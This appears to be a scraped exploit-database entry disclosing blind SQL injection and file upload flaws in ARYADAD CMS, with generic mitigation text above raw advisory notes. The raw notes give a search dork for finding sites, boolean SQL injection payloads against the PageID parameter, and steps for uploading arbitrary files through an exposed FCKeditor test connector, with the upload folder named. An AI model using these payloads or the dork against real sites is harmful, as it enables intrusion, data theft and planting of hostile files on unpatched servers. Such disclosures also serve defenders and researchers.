header-logo
Suggest Exploit
vendor:
ARYADAD CMS
by:
Red Security TEAM
7,5
CVSS
HIGH
Blind SQL Injection and File Upload
89,434
CWE
Product Name: ARYADAD CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2008 (IIS 7.5)
2012

ARYADAD Multi Vulnerability

Blind SQL Injection Vulnerability: This vulnerability allows an attacker to inject malicious SQL queries into the application. This can be done by sending a crafted request with a malicious payload to the application. The application then processes the request and executes the malicious SQL query. File Upload Vulnerability: This vulnerability allows an attacker to upload malicious files to the application. This can be done by sending a crafted request with a malicious payload to the application. The application then processes the request and executes the malicious file.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed. File uploads should be restricted to only allow certain file types and should be scanned for malicious content.
Source

Exploit-DB raw data:

# 
# Title     : ARYADAD Multi Vulnerability
# Author    : Red Security TEAM
# Date      : 21/01/2012
# Vendor    : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork      : Powered by ARYADAD Corporation
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# 
# I         : Blind SQL Injection Vulnerability
# True      : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False     : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II        : File Upload Vulnerability
# 1. Go to  : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#